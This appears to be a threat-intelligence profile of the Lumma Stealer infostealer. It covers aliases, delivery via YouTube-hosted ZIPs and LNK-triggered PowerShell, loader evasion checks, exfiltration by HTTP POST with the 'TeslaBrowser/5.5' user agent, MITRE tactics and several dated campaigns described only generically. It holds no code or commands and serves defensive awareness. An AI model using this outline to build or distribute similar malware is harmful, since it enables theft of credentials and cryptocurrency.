Lumma Stealer | |
Type of Malware | Infostealer and Banking Trojan |
Country of Origin | Russia |
Date of initial activity | August 2022 |
Targeted Countries | Global |
Addittional Names | LummaC2 Stealer |
Associated Groups | Plymouth, Shamel |
Variants | CrackedCantil |
Motivation | Financial gain |
Attack Vectors | Infected email attachments, malicious online ads, social engineering, software cracks, phishing emails, spam, fake updates, YouTube, Discord |
Targeted Systems | Windows |
Overview
Lumma Stealer, also known as LummaC2 Stealer, is a sophisticated information-stealing malware first observed in August 2022. Developed by the threat actor known as “Shamel” or “Lumma,” this malware is distributed through a Malware-as-a-Service (MaaS) model on Russian-speaking forums, targeting a range of sensitive data. Written in C language, Lumma Stealer primarily focuses on compromising cryptocurrency wallets and two-factor authentication (2FA) browser extensions. It exfiltrates stolen information by sending it to a command-and-control (C2) server via HTTP POST requests, using the user agent “TeslaBrowser/5.5.”
The malware’s capabilities extend beyond simple data theft; it includes a non-resident loader that can deliver additional malicious payloads in the form of EXE, DLL, or PowerShell scripts. This makes Lumma Stealer a versatile tool in the arsenal of cybercriminals, combining targeted data extraction with the potential for further compromise through additional malware delivery.
Targets
Cryptocurrency wallets, 2FA browser extensions, sensitive information
How they operate
The operational mechanics of Lumma Stealer are multifaceted and designed for stealth and efficacy. At its core, the malware is delivered to victims through various methods, often disguised as legitimate software or embedded within malicious content. One of the notable delivery mechanisms involves compromised YouTube accounts that distribute infected files through video descriptions. Victims are lured into downloading ZIP archives containing the malware. Inside these archives, Lumma Stealer’s payload is often obscured within an LNK (shortcut) file, which, when executed, triggers PowerShell scripts to download additional components from remote locations, such as GitHub.
Upon execution, Lumma Stealer deploys a non-resident loader, which serves multiple functions including the delivery of additional payloads and maintaining persistence on the victim’s machine. The loader is equipped with various environment checks, anti-virtual machine, and anti-debugging mechanisms to evade detection and analysis. This loader then executes the main Lumma Stealer payload, which performs a comprehensive theft of sensitive data. It primarily targets data related to cryptocurrency wallets and 2FA extensions, but also seeks out other valuable information stored on the infected system.
The exfiltration process involves transmitting the stolen data to a Command and Control (C2) server using HTTP POST requests. The malware employs a custom user agent string, “TeslaBrowser/5.5,” to blend in with legitimate traffic and avoid detection. The data exfiltrated includes credentials, financial information, and other sensitive data that can be exploited for various malicious purposes. The communication between the malware and its C2 server is designed to be covert, minimizing the risk of detection by traditional security measures.
MITRE Tactics and Techniques
Initial Access (TA0001)
Execution (TA0002)
Persistence (TA0003)
Privilege Escalation (TA0004)
Defense Evasion (TA0005)
Credential Access (TA0006)
Discovery (TA0007)
Exfiltration (TA0010)
Impact / Significant Attacks
YouTube Distribution Campaigns (January 2024)
Lumma Stealer was prominently distributed via compromised YouTube channels. Cybercriminals leveraged popular video platforms to disguise malicious links as legitimate software downloads, leading to widespread infections. The malware was embedded in ZIP files and distributed through YouTube video descriptions, taking advantage of the platform’s reach to spread the infection.
High-Profile Cryptocurrency Theft (August 2023)
Lumma Stealer played a key role in a large-scale cryptocurrency theft operation. The malware targeted users of popular cryptocurrency wallets and 2FA extensions, leading to the exfiltration of sensitive financial information. This attack resulted in significant losses for victims, underscoring the malware’s effectiveness in targeting digital assets.
Credential Harvesting Campaign (December 2023)
In late 2023, Lumma Stealer was involved in a campaign that focused on harvesting credentials from various online services. The malware collected data from email clients, social media accounts, and other online platforms, leading to widespread credential breaches and account takeovers.
Corporate Data Breach (November 2023)
Lumma Stealer was used in a targeted attack against a corporate network. The malware was delivered through phishing emails, and once inside the network, it exfiltrated sensitive corporate data, including financial records and proprietary information. This breach highlighted the malware’s capability to penetrate and operate within corporate environments.
Ransomware Deployment Support (October 2023)
In some cases, Lumma Stealer was employed as a precursor to ransomware attacks. The stolen data, including sensitive business information and personal details, was used to coerce victims into paying ransoms. This tactic demonstrated the malware’s role in facilitating more severe forms of cyber extortion.
